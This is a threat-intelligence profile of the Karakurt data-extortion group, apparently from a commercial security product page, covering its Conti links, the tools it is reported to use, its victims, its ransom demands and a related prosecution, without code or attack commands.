KaraKurt
Karakurt is a ransomware and data-extortion operation associated in the provided reporting with the broader Conti/TrickBot cybercrime ecosystem and, in multiple sources, with former Conti leaders or members. The activity was first spotted in June 2021 and publicly detailed by Accenture in December 2021, although prosecutors also described Karakurt as active since at least 2020. The group is repeatedly characterized as using extortion-only or encryption-less tactics centered on data theft and threats to leak stolen information, though some reporting and court material also refer to it as a ransomware operation. Karakurt has been linked in ransom-note branding and related reporting with other names used by the same broader organization, including Conti, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira.
High-confidence tradecraft described in the content includes initial access via stolen VPN credentials; use of Cobalt Strike, AnyDesk, Mimikatz, PowerShell, 7zip, WinZip, Rclone, FileZilla, and Mega.io; and exfiltration-driven extortion. A joint FBI/CISA/Treasury/FinCEN alert cited in the content states Karakurt typically gave victims one week to pay ransom demands ranging from $25,000 to $13 million in Bitcoin. The group has also been associated with re-extortion or follow-on extortion activity against prior ransomware victims.
Victimology in the content indicates most known victims were in North America, with others in Europe. Reported victims included businesses, government entities, and healthcare organizations; one cited case involved Ann & Robert H. Lurie Children’s Hospital of Chicago with data theft confirmed. Court reporting tied the broader organization using the Karakurt brand to attacks on more than 54 companies worldwide between June 2021 and August 2023, exposure of sensitive data such as Social Security numbers, addresses, dates of birth, and healthcare records, and one incident that forced a government entity’s 911 emergency system offline.
The content also links Karakurt to the prosecution of Deniss Zolotarjovs, a Latvian national described as a negotiator/extortionist for a Russian-linked ransomware organization that used the Karakurt brand among others. Prosecutors said he analyzed stolen data, researched victims, and used highly sensitive information, including pediatric health records, to intensify extortion. Additional ecosystem reporting in the content connects Karakurt to the TrickBot/Conti lineage, including statements that TrickBot partnered with groups deploying Karakurt and that wallets linked to Conti leader alias Stern transacted with addresses associated with Karakurt.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In one case, attempts to exploit CVE-2020-1472, also known as Zerologon, were detected by security software. The actual environment was not vulnerable to Zerologon however indicating Karakurt may be attempting to exploit a number of vulnerabilities as part of their operation.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...Stern has transacted with addresses linked to strains like Quantum, Karakurt, Diavol, and Royal in 2022 following Conti’s demise.
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic.
Exfiltration
1 techniqueDuring the time of Zolotarjovs’s active participation ... the organization stole data from over 54 companies ... Attacks during this period resulted in the theft and exposure of Social Security numbers, addresses, dates of birth, home addresses, healthcare information...
Impact
2 techniques"Trickbot has ... partnered with ransomware groups to deploy several strains including Ryuk, Conti, Diavol, and Karakurt."
When he failed in extracting a ransom from this victim, he urged coconspirators to be “DESTROYERS” and to leak or sell copies of these pediatric health records to sow fear among future victims. | During the time of Zolotarjovs’s active participation ... the organization stole data from over 54 companies ... Zolotarjovs was primarily responsible for escalating pressure on victims who initially resisted prompt payment of the organization’s ransom demands. Zolotarjovs analyzed stolen data, researched victim companies, and exploited his access to particularly sensitive and extremely personal information.
Recent activity
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A ransomware brand operated by the syndicate during the June 2021 to August 2023 period.
Karakurt is a cyber extortion/ransomware operation tied to former Conti members. It stole data from victim organizations, used that data for extortion, and in attacks leveraged VPN credentials for initial access, then tools such as Cobalt Strike, AnyDesk, Mimikatz, PowerShell, 7zip, WinZip, Rclone, and FileZilla to maintain access, escalate privileges, and exfiltrate data.
A name used by the extortion crew in ransom notes as part of its multi-brand ransomware and data-extortion operations.
Named as one of the brands or identities associated with a ransomware gang led by former Conti leaders and involved in data theft and extortion.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.